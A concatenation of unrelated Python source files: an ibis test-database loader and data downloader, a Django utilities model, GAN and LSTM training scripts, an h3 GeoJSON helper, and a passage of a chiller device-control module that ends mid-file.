import getpass
import tempfile
import tarfile
import operator
import sqlalchemy as sa
import numpy as np
import pandas as pd
import click
try:
import sh
except ImportError:
import pbs as sh
@click.group()
def cli():
pass
@cli.command()
@click.argument('tables', nargs=-1)
@click.option('-S', '--script', type=click.File('rt'), required=True)
@click.option(
'-d', '--database',
default=os.environ.get('IBIS_TEST_CLICKHOUSE_DB', 'ibis_testing')
)
@click.option(
'-D', '--data-directory',
default=tempfile.gettempdir(), type=click.Path(exists=True)
)
def clickhouse(script, tables, database, data_directory):
username = os.environ.get('IBIS_CLICKHOUSE_USER', 'default')
host = os.environ.get('IBIS_CLICKHOUSE_HOST', 'localhost')
password = os.environ.get('IBIS_CLICKHOUSE_PASS', '')
url = sa.engine.url.URL(
'clickhouse+native',
username=username,
host=host,
password=password,
)
engine = sa.create_engine(str(url))
engine.execute('DROP DATABASE IF EXISTS "{}"'.format(database))
engine.execute('CREATE DATABASE "{}"'.format(database))
url = sa.engine.url.URL(
'clickhouse+native',
username=username,
host=host,
password=password,
database=database,
)
engine = sa.create_engine(str(url))
script_text = script.read()
# missing stmt
# INSERT INTO array_types (x, y, z, grouper, scalar_column) VALUES
# ([1, 2, 3], ['a', 'b', 'c'], [1.0, 2.0, 3.0], 'a', 1.0),
# ([4, 5], ['d', 'e'], [4.0, 5.0], 'a', 2.0),
# ([6], ['f'], [6.0], 'a', 3.0),
# ([1], ['a'], [], 'b', 4.0),
# ([2, 3], ['b', 'c'], [], 'b', 5.0),
# ([4, 5], ['d', 'e'], [4.0, 5.0], 'c', 6.0);
with engine.begin() as con:
# doesn't support multiple statements
for stmt in script_text.split(';'):
if len(stmt.strip()):
con.execute(stmt)
table_paths = [
os.path.join(data_directory, '{}.csv'.format(table))
for table in tables
]
dtype = {'bool_col': np.bool_}
for table, path in zip(tables, table_paths):
# correct dtypes per table to be able to insert
# TODO: cleanup, kinda ugly
df = pd.read_csv(path, index_col=None, header=0, dtype=dtype)
if table == 'functional_alltypes':
df = df.rename(columns={'Unnamed: 0': 'Unnamed_0'})
cols = ['date_string_col', 'string_col']
df[cols] = df[cols].astype(str)
df.timestamp_col = df.timestamp_col.astype('datetime64[s]')
elif table == 'batting':
cols = ['playerID', 'teamID', 'lgID']
df[cols] = df[cols].astype(str)
cols = df.select_dtypes([float]).columns
df[cols] = df[cols].fillna(0).astype(int)
elif table == 'awards_players':
cols = ['playerID', 'awardID', 'lgID', 'tie', 'notes']
df[cols] = df[cols].astype(str)
df.to_sql(table, engine, index=False, if_exists='append')
@cli.command()
@click.argument('tables', nargs=-1)
@click.option('-S', '--script', type=click.File('rt'), required=True)
@click.option(
'-d', '--database',
default=os.environ.get(
'IBIS_TEST_POSTGRES_DB', os.environ.get('PGDATABASE', 'ibis_testing')
),
)
@click.option(
'-D', '--data-directory',
default=tempfile.gettempdir(), type=click.Path(exists=True)
)
def postgres(script, tables, database, data_directory):
username = os.environ.get(
'IBIS_POSTGRES_USER', os.environ.get('PGUSER', getpass.getuser())
)
host = os.environ.get('PGHOST', 'localhost')
password = os.environ.get('IBIS_POSTGRES_PASS', os.environ.get('PGPASS'))
url = sa.engine.url.URL(
'postgresql',
username=username,
host=host,
password=password,
)
engine = sa.create_engine(str(url), isolation_level='AUTOCOMMIT')
engine.execute('DROP DATABASE IF EXISTS "{}"'.format(database))
engine.execute('CREATE DATABASE "{}"'.format(database))
url = sa.engine.url.URL(
'postgresql',
username=username,
host=host,
password=password,
database=database,
)
engine = sa.create_engine(str(url))
script_text = script.read()
with engine.begin() as con:
con.execute(script_text)
table_paths = [
os.path.join(data_directory, '{}.csv'.format(table))
for table in tables
]
dtype = {'bool_col': np.bool_}
for table, path in zip(tables, table_paths):
df = pd.read_csv(path, index_col=None, header=0, dtype=dtype)
df.to_sql(table, engine, index=False, if_exists='append')
engine = sa.create_engine(str(url), isolation_level='AUTOCOMMIT')
engine.execute('VACUUM FULL ANALYZE')
@cli.command()
@click.argument('tables', nargs=-1)
@click.option('-S', '--script', type=click.File('rt'), required=True)
@click.option(
'-d', '--database',
default=os.environ.get('IBIS_TEST_SQLITE_DB_PATH', 'ibis_testing.db')
)
@click.option(
'-D', '--data-directory',
default=tempfile.gettempdir(), type=click.Path(exists=True)
)
def sqlite(script, tables, database, data_directory):
database = os.path.abspath(database)
if os.path.exists(database):
try:
os.remove(database)
except OSError:
pass
engine = sa.create_engine('sqlite:///{}'.format(database))
script_text = script.read()
with engine.begin() as con:
con.connection.connection.executescript(script_text)
table_paths = [
os.path.join(data_directory, '{}.csv'.format(table))
for table in tables
]
click.echo(tables)
click.echo(table_paths)
for table, path in zip(tables, table_paths):
df = pd.read_csv(path, index_col=None, header=0)
with engine.begin() as con:
df.to_sql(table, con, index=False, if_exists='append')
engine.execute('VACUUM')
engine.execute('VACUUM ANALYZE')
if os.environ.get('APPVEYOR', None) is not None:
curl = sh.Command('C:\\Tools\\curl\\bin\\curl.exe')
else:
curl = sh.curl
@cli.command()
@click.argument(
'base_url',
required=False,
default='https://storage.googleapis.com/ibis-ci-data' # noqa: E501
)
@click.option('-d', '--data', multiple=True)
@click.option('-D', '--directory', default='.', type=click.Path(exists=False))
def download(base_url, data, directory):
if not data:
data = 'ibis-testing-data.tar.gz',
if not os.path.exists(directory):
os.mkdir(directory)
for piece in data:
data_url = '{}/{}'.format(base_url, piece)
path = os.path.join(directory, piece)
curl(
data_url, o=path, L=True,
_out=click.get_binary_stream('stdout'),
_err=click.get_binary_stream('stderr'),
)
if piece.endswith(('.tar', '.gz', '.bz2', '.xz')):
with tarfile.open(path, mode='r|gz') as f:
f.extractall(path=directory)
def parse_env(ctx, param, values):
pairs = []
for envar in values:
try:
name, value = envar.split('=', 1)
except ValueError:
raise click.ClickException(
'Environment variables must be of the form NAME=VALUE. '
'{} is not in this format'.format(envar)
)
pairs.append((name, value))
return dict(pairs)
@cli.command()
@click.argument('data_directory', type=click.Path(exists=True))
@click.option('-e', '--environment', multiple=True, callback=parse_env)
def env(data_directory, environment):
envars = dict([
('IBIS_TEST_IMPALA_HOST', 'impala'),
('IBIS_TEST_NN_HOST', 'impala'),
('IBIS_TEST_IMPALA_POST', 21050),
('IBIS_TEST_WEBHDFS_PORT', 50070),
('IBIS_TEST_WEBHDFS_USER', 'ubuntu'),
(
'IBIS_TEST_SQLITE_DB_PATH',
os.path.join(data_directory, 'ibis_testing.db'),
),
(
'DIAMONDS_CSV',
os.path.join(data_directory, 'diamonds.csv')
),
(
'BATTING_CSV',
os.path.join(data_directory, 'batting.csv')
),
(
'AWARDS_PLAYERS_CSV',
os.path.join(data_directory, 'awards_players.csv')
),
(
'FUNCTIONAL_ALLTYPES_CSV',
os.path.join(data_directory, 'functional_alltypes.csv')
),
('IBIS_TEST_POSTGRES_DB', 'ibis_testing'),
('IBIS_POSTGRES_USER', getpass.getuser()),
('IBIS_POSTGRES_PASS', ''),
])
envars.update(environment)
string = '\n'.join(
'='.join((name, str(value)))
for name, value in sorted(envars.items(), key=operator.itemgetter(0))
)
click.echo(string)
if __name__ == '__main__':
cli()
|
991,293 | 77664bc81bc81721dc376defdceed2f4bf701ad2 | from django.db import models
from datetime import datetime
import json
# Create your models here.
class UtilsManager(models.Manager):
def retornar_fecha(self, fecha=None):
if fecha != None:
print('La fecha recibida es: ' + fecha)
return datetime.strptime(fecha, '%Y-%m-%d %H:%M:%S')
else:
return Utils.NO_ENCONTRADO
def definir_respuesta(self, result=None):
resultado = Resultados()
try:
print(result)
if result == Utils.NO_ENCONTRADO or result == None:
resultado.status = Utils.NO_ENCONTRADO
resultado.message = 'Proyecto no encontrado.'
return resultado
elif result == Utils.NO_PERMITIDO:
resultado.status = Utils.NO_PERMITIDO
resultado.message = 'Operacion invalida.'
return resultado
elif result == Utils.ERROR:
resultado.status = Utils.ERROR
resultado.message = 'Ocurrio algun error.'
return resultado
elif result == Utils.SIN_EFECTOS:
resultado.status = Utils.SIN_EFECTOS
resultado.message = 'La operacion no tuvo efectos.'
return resultado
elif result == Utils.BAD_REQUEST:
resultado.status = Utils.BAD_REQUEST
resultado.message = 'Bad Request.'
elif result != None:
print('Respuesta exitosa!..')
resultado.status = Utils.RESPUESTSA_EXITOSA
resultado.message = 'Respuesta exitosa!..'
return resultado
return resultado
except:
print('Es una instancia.')
print(result)
print('Respuesta exitosa!..')
resultado.status = Utils.RESPUESTSA_EXITOSA
resultado.message = 'Respuesta exitosa!..'
return resultado
class Utils(models.Model):
NO_ENCONTRADO = 'NE'
ERROR = 'EE'
SIN_EFECTOS = 'SE'
NO_PERMITIDO = 'NP'
RESPUESTSA_EXITOSA = 'RE'
BAD_REQUEST = 'BD'
RTA_MET = (
('NE', 'NO_ENCONTRADO'),
('SE', 'SIN_EFECTOS'),
('EE', 'ERROR'),
('NP', 'NO_PERMITIDO'),
('RE', 'RESPUESTSA_EXITOSA'),
('BD', 'BAD_REQUEST'),
)
objects = UtilsManager()
class Resultados:
status = ''
message = ''
def __init__(self, status=None, message=None):
self.status = status
self.message = message
def to_json(self):
return json.dumps(self.__dict__) |
991,294 | 639285ffc92289b235e58e434061bdbe809467ae | from __future__ import print_function
import os, sys
#os.environ["CUDA_VISIBLE_DEVICES"] = "1"
#per_process_gpu_memory_fraction = 0.45
gpu_memory_allow_growth = True
from shutil import *
import tensorflow as tf
from utils import pp, makedirs
from print_hook import PrintHook
import numpy as np
import scipy.ndimage
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_integer("iIterCheckpoint", 10000, "")
tf.app.flags.DEFINE_integer("iSamplesEvaluate", 50000, "")
tf.app.flags.DEFINE_boolean("bLoadCheckpoint", False, "bLoadCheckpoint")
tf.app.flags.DEFINE_boolean("bLoadForEvaluation", False, "bLoadForEvaluation")
tf.app.flags.DEFINE_float("fLrIniG", 0.0004, "")
tf.app.flags.DEFINE_float("fLrIniD", 0.0004, "")
tf.app.flags.DEFINE_float("fLrDecay", 0.5, "")
tf.app.flags.DEFINE_integer("iLrStep", 100000, "")
tf.app.flags.DEFINE_boolean("bLrStair", True, "")
tf.app.flags.DEFINE_integer("iBatchRun", 1000000, "")
tf.app.flags.DEFINE_integer("iBatchSize", 100, "")
tf.app.flags.DEFINE_integer("iSSIM", 10, "")
############################################################################################################################################
tf.app.flags.DEFINE_float("fLimitedD", 0.00, "")
tf.app.flags.DEFINE_float("fLimitedG", 1.00, "")
tf.app.flags.DEFINE_string("sDataSet", "cifar10", "cifar10, mnist, toy, celebA, toyc, imagenet")
tf.app.flags.DEFINE_string("sResultTag", "test", "your tag for each test case")
tf.app.flags.DEFINE_boolean("GN", False, "")
tf.app.flags.DEFINE_boolean("GP", False, "")
tf.app.flags.DEFINE_boolean("WGAN", False, "")
tf.app.flags.DEFINE_boolean("CGAN", False, "")
tf.app.flags.DEFINE_boolean("LAB", True, "")
tf.app.flags.DEFINE_boolean("AC", True, "")
tf.app.flags.DEFINE_float("sharp_pow", 0.00, "")
tf.app.flags.DEFINE_float("D_AC_WEIGHT", 0.0, "")
tf.app.flags.DEFINE_float("G_AC_WEIGHT", 1.0, "")
tf.app.flags.DEFINE_boolean("DIST_AC_GEN_EVEN", False, "")
tf.app.flags.DEFINE_boolean("DIST_AC_GEN_ACGAN", False, "")
tf.app.flags.DEFINE_float("DECAY_WEIGHT", 0.0, "")
tf.app.flags.DEFINE_float("GN_WEIGHT", 0.0, "")
tf.app.flags.DEFINE_boolean("FAKE_LOGIT", False, "")
tf.app.flags.DEFINE_string("PATH", False, "")
tf.app.flags.DEFINE_boolean("MODE", False, "")
tf.app.flags.DEFINE_boolean("bPredefined", False, "")
tf.app.flags.DEFINE_boolean("bUseClassLabel", True, "")
tf.app.flags.DEFINE_integer("iUnlableClass", 20, "")
tf.app.flags.DEFINE_float("f2Smoothed", 1.00, "")
tf.app.flags.DEFINE_float("fkSmoothed", 1.00, "")
tf.app.flags.DEFINE_string("generator", 'generator', "generator, generator_vbn, generator_mnist")
tf.app.flags.DEFINE_string("discriminator", 'discriminator', "discriminator, discriminator_mnist")
tf.app.flags.DEFINE_string("sResultDir", "../result/", "where to save the checkpoint and sample")
tf.app.flags.DEFINE_string("sSourceDir", "../code/", "")
############################################################################################################################################
tf.app.flags.DEFINE_float("iInputNoisePow", 2, "")
tf.app.flags.DEFINE_float("fInputNoise", 0.10, "")
tf.app.flags.DEFINE_float("fInputNoiseMin", 0.10, "")
tf.app.flags.DEFINE_float("fLayerNoiseD", 0.00, "")
tf.app.flags.DEFINE_float("fLayerDropoutD", 0.30, "")
tf.app.flags.DEFINE_integer("iKsizeG", 3, "3, 4, 5")
tf.app.flags.DEFINE_integer("iKsizeD", 3, "3, 4, 5")
tf.app.flags.DEFINE_integer("iFilterDimG", 192, "")
tf.app.flags.DEFINE_integer("iFilterDimD", 128, "")
tf.app.flags.DEFINE_float("fDimIncreaseRate", 2.0, "")
tf.app.flags.DEFINE_string("oUp", 'deconv', "deconv, resizen, resizel, phaseshift, deconvpool, depth_space")
tf.app.flags.DEFINE_string("oDown", 'conv', "conv, resizen, resizel, avgpool, maxpool, convpool, space_depth")
tf.app.flags.DEFINE_integer("dfirst1", 1, "")
tf.app.flags.DEFINE_integer("gfirst1", 1, "")
tf.app.flags.DEFINE_string("dfinal", 'avgpool', "avgpool, sqrpool, none")
tf.app.flags.DEFINE_boolean("bAddHZ", False, "")
tf.app.flags.DEFINE_boolean("bUseUniformZ", False, "")
tf.app.flags.DEFINE_boolean("bNormalizeZ", False, "") # set len(Z) = 1
############################################################################################################################################
tf.app.flags.DEFINE_integer("iTrainG", 1, "")
tf.app.flags.DEFINE_integer("iTrainD", 1, "")
tf.app.flags.DEFINE_integer("iWarmD", 0, "")
tf.app.flags.DEFINE_integer("iWarmDIterPer", 10, "")
tf.app.flags.DEFINE_float("fBeta1G", 0.5, "")
tf.app.flags.DEFINE_float("fBeta1D", 0.5, "")
tf.app.flags.DEFINE_float("fBeta2G", 0.999, "")
tf.app.flags.DEFINE_float("fBeta2D", 0.999, "")
tf.app.flags.DEFINE_string("oOptG", 'adam', "adam, rmsprop, sgd")
tf.app.flags.DEFINE_string("oOptD", 'adam', "adam, rmsprop, sgd")
tf.app.flags.DEFINE_string("oActG", 'lrelu', "relu, lrelu, elu")
tf.app.flags.DEFINE_string("oActD", 'lrelu', "relu, lrelu, elu")
tf.app.flags.DEFINE_string("oBnG", 'bn', "bn, ln, none")
tf.app.flags.DEFINE_string("oBnD", 'bn', "bn, ln, none")
############################################################################################################################################
tf.app.flags.DEFINE_integer("iDimsC", 3, "")
tf.app.flags.DEFINE_integer("iDimsZ", 100, "")
tf.app.flags.DEFINE_integer("iResG", 0, "")
tf.app.flags.DEFINE_integer("iResD", 0, "")
tf.app.flags.DEFINE_integer("iMinSizeD", 4, "")
############################################################################################################################################
tf.app.flags.DEFINE_boolean("bUseLabel", True, "")
tf.app.flags.DEFINE_boolean("bUseUnlabel", False, "")
tf.app.flags.DEFINE_integer("iNumLabelData", 400, "")
############################################################################################################################################
tf.app.flags.DEFINE_string("sEvaluateCheckpoint", "", "")
tf.app.flags.DEFINE_boolean("bAugment", False, "")
tf.app.flags.DEFINE_string("sLogfileName", 'log.txt', "log file name")
tf.app.flags.DEFINE_integer("iImageSize", 32, "")
tf.app.flags.DEFINE_boolean("Use32_MNIST", True, "")
tf.app.flags.DEFINE_integer("iSaveCount", 100, "")
tf.app.flags.DEFINE_boolean("bCropImage", True, "")
tf.app.flags.DEFINE_integer("iCenterCropSize", 108, "")
tf.app.flags.DEFINE_boolean("test", False, "")
tf.app.flags.DEFINE_boolean("debug", False, "")
############################################################################################################################################
def main(_):
##############################################
if FLAGS.sDataSet == 'mnist':
FLAGS.Use32_MNIST = (FLAGS.generator != 'generator_mnist')
FLAGS.iImageSize = 32 if FLAGS.Use32_MNIST else 28
FLAGS.iDimsC = 1
if not FLAGS.bUseClassLabel:
FLAGS.bUseLabel = False
FLAGS.bUseUnlabel = True
if not FLAGS.bUseLabel:
assert FLAGS.bUseUnlabel
if not FLAGS.bUseLabel:
FLAGS.iNumLabelData = 0
if not FLAGS.bUseUnlabel:
FLAGS.iNumLabelData = 10000000000000000
if FLAGS.CGAN:
FLAGS.bPredefined = True
FLAGS.logModel = 'a' # if FLAGS.bLoadCheckpoint else 'w'
##############################################
FLAGS.sTestName = (FLAGS.sResultTag + '_' if len(FLAGS.sResultTag) else "") + FLAGS.sDataSet
FLAGS.sTestCaseDir = FLAGS.sResultDir + FLAGS.sTestName
FLAGS.sSampleDir = FLAGS.sTestCaseDir + '/samples'
FLAGS.checkpoint_dir = FLAGS.sTestCaseDir + '/checkpoint'
FLAGS.sLogfileName = FLAGS.sTestCaseDir + '/log.txt'
makedirs(FLAGS.checkpoint_dir)
makedirs(FLAGS.sTestCaseDir + '/code')
makedirs(FLAGS.sSampleDir)
makedirs(FLAGS.sSampleDir + '/class_random')
makedirs(FLAGS.sSampleDir + '/fixed_noise')
print(FLAGS.sTestCaseDir)
tf.logging.set_verbosity(tf.logging.ERROR)
##############################################
config = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False)
if gpu_memory_allow_growth:
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
logfile = open(FLAGS.sLogfileName, FLAGS.logModel)
def MyHookOut(text):
if '\r' not in text:
logfile.write(text)
return 1, 0, text
phOut = PrintHook()
phOut.Start(MyHookOut)
for arg in ['CUDA_VISIBLE_DEVICES="x" python'] + sys.argv:
sys.stdout.write(arg + ' ')
print('\n')
print(pp.pformat(FLAGS.__flags))
def copycode(src, dst):
for item in os.listdir(src):
s = os.path.join(src, item)
d = os.path.join(dst, item)
if s.endswith('.py'):
copy2(s, d)
copycode(FLAGS.sSourceDir, FLAGS.sTestCaseDir + '/code')
from model import DCGAN
dcgan = DCGAN(sess, cfg=FLAGS)
dcgan.train(FLAGS)
if __name__ == '__main__':
tf.app.run()
|
991,295 | afabca0540e7ee6246b7f22f3af2c78a847feb5b | from utils import load_doc
import numpy as np
from keras.preprocessing.text import Tokenizer
from keras.utils import to_categorical
from keras.models import Sequential
from keras.layers import Dense, LSTM, Embedding
from pickle import dump
def define_model(vocab_size, seq_length):
model = Sequential()
model.add(Embedding(vocab_size, 50, input_length=seq_length))
model.add(LSTM(100, return_sequences=True))
model.add(LSTM(100))
model.add(Dense(100, activation='relu'))
model.add(Dense(vocab_size, activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
model.summary()
return model
doc = load_doc('republic_sequences.txt')
lines = doc.split('\n')
tokenizer = Tokenizer()
tokenizer.fit_on_texts(lines)
sequences = tokenizer.texts_to_sequences(lines)
vocab_size = len(tokenizer.word_index) + 1
print('Vocab size is: {:d}'.format(vocab_size))
sequences = np.array(sequences)
X = sequences[:,:-1]
Y = sequences[:,-1]
Y = to_categorical(Y, num_classes=vocab_size)
seq_length = X.shape[1]
model = define_model(vocab_size, seq_length)
model.fit(X, Y, epochs=100, batch_size=64, verbose=1)
model.save('model.h5')
dump(tokenizer, open('tokenizer.pkl', 'wb'))
|
991,296 | c2dd55f26cb8de329ba31cd147970aaa4e1a9ddb | import scripts.other_module as om
from h3 import h3
om.get_me()
translate_statistic = {'Med': 'Median', 'Mean': 'Mean'}
translate_pollutant = {'BC': 'BC', 'NO': 'NO', 'NO2': r'NO$_2$'}
concentration_labels = {
'BC': r'$\mu$g m$^{-3}$',
'NO': r'ppb',
r'NO$_2$': r'ppb'
}
def to_geojson(df, h3_address='h3_address'):
swipe = lambda x: [x[1], x[0]]
df['h3_bound'] = df[h3_address].apply(h3.h3_to_geo_boundary)
df['h3_bound'] = df['h3_bound'].apply(lambda x: list(map(swipe, x)))
df['h3_bound'] = df['h3_bound'].apply(lambda x: [x + [x[0]]])
geojson = {'features': [],
'type': 'FeatureCollection'}
feature = {'geometry':
{'coordinates': None,
'type': 'Polygon'},
'properties': {'id': None},
'type': 'Feature'}
for i, row in enumerate(df['ready']):
_feature = deepcopy(feature)
_feature['geometry']['coordinates'] = row
_feature['properties']['id'] = str(i)
geojson['features'].append(_feature)
return geojson |
991,297 | 5733aa417624ff8594071cc9eb89e63536c99536 | #!/usr/bin/env python3
from ba.data import Generator
import sys
if __name__ == '__main__':
if len(sys.argv) < 2:
print('No arguments given')
sys.exit()
gen = Generator(sys.argv[1:])
gen.run()
|
991,298 | 7f8ec043c395900c2107e301eb271f1e027e0daa | """
Remote control of thermoelectric chiller by Solid State Cooling Systems,
www.sscooling.com, via RS-323 interface
Model: Oasis 160
"""
__version__ = '0.0.0'
import traceback
import psutil, os, sys
import platform #https://stackoverflow.com/questions/110362/how-can-i-find-the-current-os-in-python
p = psutil.Process(os.getpid()) #source: https://psutil.readthedocs.io/en/release-2.2.1/
# psutil.ABOVE_NORMAL_PRIORITY_CLASS
# psutil.BELOW_NORMAL_PRIORITY_CLASS
# psutil.HIGH_PRIORITY_CLASS
# psutil.IDLE_PRIORITY_CLASS
# psutil.NORMAL_PRIORITY_CLASS
# psutil.REALTIME_PRIORITY_CLASS
if platform.system() == 'Windows':
p.nice(psutil.REALTIME_PRIORITY_CLASS)
elif platform.system() == 'Linux': #linux FIXIT
p.nice(-20) # nice runs from -20 to +12, where -20 the most not nice code(highest priority)
from numpy import nan, mean, std, nanstd, asfarray, asarray, hstack, \
array, concatenate, delete, round, vstack, hstack, zeros, \
transpose, split, unique, nonzero, take, savetxt, min, max
from time import time, sleep
import sys
import struct
from pdb import pm
from time import gmtime, strftime, time
from struct import pack, unpack
from timeit import Timer, timeit
from threading import Thread, Event, Timer, Condition
from datetime import datetime
if sys.version_info[0] ==3:
from persistent_property.persistent_property3 import persistent_property
from _thread import start_new_thread
from time import process_time as clock
from logging import debug,info,warn,error
from logging import warning as warn
else:
from persistent_property.persistent_property import persistent_property
from thread import start_new_thread
from time import clock
from logging import debug,info,warn,error
from XLI.precision_sleep import precision_sleep #home-made module for accurate sleep
from XLI.circular_buffer_LL import CBQueue, CBServer, CBClient #home-made module with circular buffers and queues
from XLI.hierarchy_instrumentation import XLevelTemplate, IndicatorsTemplate, ControlsTemplate #Classes for different objects
##################################################################################################################
##################################################################################################################
###### Indicators ######
##################################################################################################################
##################################################################################################################
###### Description ######
##"""
##The Indicators Class inherits properties from IndicatorsTemplate in XLI package
##"""
##"""
##There are handfull of important functions that each Indicators class has has:
##- get # returns a dictionary of all avaiable controls and theit current values
##
##"""
##
##"""
##The typical structure of indicators variables.
##get funtion, that will be executed if the server-IO will get a command to retrieve indicator variable.
##Usually, these indicators have dublicated in template_dl module or some other module for easier management.
##
##Example:
##def get_s_frequency(self):
## return icarus_dl.pr_rate
##s_frequency = property(get_s_frequency)
##"""
##################################################################################################################
class Indicators(IndicatorsTemplate):
###Data Acquisision module indicators
def get(self, value = None):
response = {}
response[b'running'] = self.running
response[b'act_temperature'] = self.act_temperature
response[b'fault'] = self.fault
response = self.get_cb_indicators(response)
###indicators to add
return response
def get_cb_indicators(self,dic):
if len(device_level.circular_buffers) != 0:
for key in list(device_level.circular_buffers.keys()):
cb_type = device_level.circular_buffers[key].type
value = device_level.circular_buffers[key].get_last_N(1)
pointer = device_level.circular_buffers[key].pointer
g_pointer = device_level.circular_buffers[key].g_pointer
if sys.version[0] == '3':
dic[b'CB '+bytes(cb_type,encoding='utf8')+bytes(' ',encoding='utf8')+key] = {b'value':value,b'pointer':pointer,b'g_pointer':g_pointer}
elif sys.version[0] == '2':
dic[b'CB '+bytes(cb_type)+bytes(' ')+key] = {b'value':value,b'pointer':pointer,b'g_pointer':g_pointer}
return dic
def get_running(self):
"""
"""
try:
response = getattr(device_level,'running')
except:
response = None #device.controls.running
warn(traceback.format_exc())
return response
def set_running(self,value):
setattr(device_level,'running',value)
running = property(get_running,set_running)
def get_act_temperature(self):
try:
response = device_level.circular_buffers['act_temperature'].get_last_N(1)[1]
except:
response = None
warn(traceback.format_exc())
return response
act_temperature = property(get_act_temperature)
def get_fault(self):
try:
response = driver.fault_description[int(device_level.circular_buffers['fault'].get_last_N(1)[1])]
except:
response = None
warn(traceback.format_exc())
return response
fault = property(get_fault)
##################################################################################################################
##################################################################################################################
###### Controls ######
##################################################################################################################
##################################################################################################################
###### Description ######
"""
The Controls Class inherits properties from ControlsTemplate in XLI package
"""
"""
There are handfull of importamt functions that each Controls class has has:
- get # returns a dictionary of all avaiable controls and theit current values
- set # sets one or several controls to specified values.
"""
"""
The typical structure of control variables.
first, set function, that will be executed if the server-IO will get a command to change control variable.
second, get funtion, that will be executed if the server-IO will get a command to retrieve control variable.
Usually, this controls have dublicated in template_dl module for easier
Example:
def set_value(self, value = 1):
template_dl.value = value
def get_value(self):
try:
response = template_dl.value
except:
response = 0
return response
value = property(get_value,set_value)
"""
##################################################################################################################
class Controls(ControlsTemplate):
def get(self):
"""defines a list of avaiable indicators.
Input: None
Output: dictionary with all avaialable indicators
Note: indicators needs to be manually added to be available.
"""
response = {}
response[b'cmd_temperature'] = self.cmd_temperature
response[b'idle_temperature'] = self.idle_temperature
return response
def set_cmd_temperature(self, value = 1):
if device_level.soft_limits[b'lower']<= value <= device_level.soft_limits[b'upper']:
device_level.cmd_temperature = value
device_level.playlist.insert(device_level.playlist_counter,[time()+2,1,value])
else:
warn('Value %r is beyound soft limits (%r,%r) set on this device' %(value,device_level.soft_limits[b'low'],device_level.soft_limits[b'high']))
def get_cmd_temperature(self):
try:
response = device_level.cmd_temperature
except:
response = None
warn(traceback.format_exc())
return response
cmd_temperature = property(get_cmd_temperature,set_cmd_temperature)
def set_idle_temperature(self, value = 1):
device_level.idle_temperature = value
def get_idle_temperature(self):
try:
response = device_level.idle_temperature
except:
response = None
warn(traceback.format_exc())
return response
idle_temperature = property(get_idle_temperature,set_idle_temperature)
def set_lower_limit(self, value = 1):
device_level.lower_limit = value
device_level.playlist.insert(device_level.playlist_counter,[time()+2,10,value])
def get_lower_limit(self):
try:
response = device_level.lower_limit
except:
warn(traceback.format_exc())
response = None
return response
lower_limit = property(get_lower_limit,set_lower_limit)
def set_upper_limit(self, value = 1):
device_level.upper_limit = value
device_level.playlist.insert(device_level.playlist_counter,[time()+2,12,value])
def get_upper_limit(self):
try:
response = device_level.upper_limit
except:
warn(traceback.format_exc())
response = None
return response
upper_limit = property(get_upper_limit,set_upper_limit)
##################################################################################################################
##################################################################################################################
###### Template Device Level ######
##################################################################################################################
##################################################################################################################
###### Description ######
"""
There are handfull of functions that each DL has:
- init # initializes DL
- abort # aborts current scheduled tasks execuation
- close # closes the DL
- snapshot # provides a quick update of the DL as snapshot
- notify_subscribers # notifies all subscribers about updates on demand
- controls # returns all controls
- indicators # returns all indicators
- schedule # schedules execution of tasks
- get_circular_buffer # returns part of a requested circular buffer
"""
"""
There are handfull of important instances or dictionaries
- inds # indicators instance (see Indicators Class)
- ctrls # controls instance (see Controls Class)
- circular_buffers # dictionary of all circular buffers, or queues.
"""
##################################################################################################################
class Oasis_DL(XLevelTemplate):
test = persistent_property('test', 'test')
update_period = 2
last_update_time = 0
playlist = []
circular_buffers = {}
task_dictionary = {}
idle_playlist = [[0,2,0]]+[[0,0,0]]*99
default_playlist = [[0,2,0]]+[[0,0,0]]*10
idle_playlist_counter = 0
playlist_counter = 0
default_temperature = 8
inds = Indicators()
ctrls = Controls()
circular_buffers = {}
idle_temperature = 8.0
soft_limits = {b'lower':2,b'upper':45}
def setup_first_time(self):
pass
def init(self, msg_in = None, client = None):
"""
initialize the DL program
"""
self.name = 'Oasis_DL'
self.circular_buffers[b'act_temperature'] = CBServer(size = (2,4320000), var_type = 'float64')
self.circular_buffers[b'cmd_temperature'] = CBServer(size = (2,4320000), var_type = 'float64')
self.circular_buffers[b'fault'] = CBServer(size = (2,10000), var_type = 'float64')
self.description = ''
self.task_dictionary[0] = {b'function':driver.get_actual_temperature,b'name':b'act_temperature'}
self.task_dictionary[1] = {b'function':driver.set_target_temperature,b'name':b'cmd_temperature'}
self.task_dictionary[2] = {b'function':driver.get_faults,b'name':b'fault'}
self.task_dictionary[10] = {b'function':driver.set_lower_limit,b'name':b'set_lower_limit'}
self.task_dictionary[11] = {b'function':driver.get_lower_limit,b'name':b'get_lower_limit'}
self.task_dictionary[12] = {b'function':driver.set_upper_limit,b'name':b'set_upper_limit'}
self.task_dictionary[13] = {b'function':driver.get_upper_limit,b'name':b'get_upper_limit'}
flag = False
message = None
err = ''
flag, message, err = driver.init(), '', ''
if flag:
self.lower_limit = driver.device_dict[b'lower_limit']
self.upper_limit = driver.device_dict[b'upper_limit']
response = {}
response[b'flag'] = flag
response[b'message'] = message
response[b'error'] = err
return response
def abort(self, msg_in = {b'mode':b'idle_temperature'}, client = None):
"""
abort current execution
"""
if msg_in is not None:
mode = msg_in[b'mode']
else:
mode = ''
self.playlist = []
self.playlist_counter = 0
if mode == b'idle_temperature':
self.ctrls.set_cmd_temperature(self.ctrls.idle_temperature)
flag = True
buff = None
err = ''
message = ''
response = {}
response[b'flag'] = flag
response[b'message'] = message
response[b'error'] = err
return response
def close(self, msg_in = None, client = None):
"""
close the DL program
"""
driver.close()
flag = True
buff = None
message = ''
err = ''
response = {}
response[b'flag'] = flag
response[b'message'] = message
response[b'error'] = err
return response
def snapshot(self, msg_in = None, client = None):
"""returns a snapshot"""
flag = True
message = {}
try:
message[b'description'] = self.description
message[b'indicators'] = self.inds.get()
message[b'controls'] = self.ctrls.get()
except:
err += traceback.format_exc()
error(err)
flag = False
buff = None
err = ''
response = {}
response[b'flag'] = flag
response[b'message'] = message
response[b'error'] = err
return response
def notify_subscribers(self, msg_in = None, client = None):
flag = False
buff = {}
buff = None
err = ''
response = {}
response[b'flag'] = flag
response[b'message'] = message
response[b'error'] = err
return response
#def controls(self, msg_in = None, client = None):
#build in controls function. See the class file for details
#def indicators(self, msg_in = None, client = None):
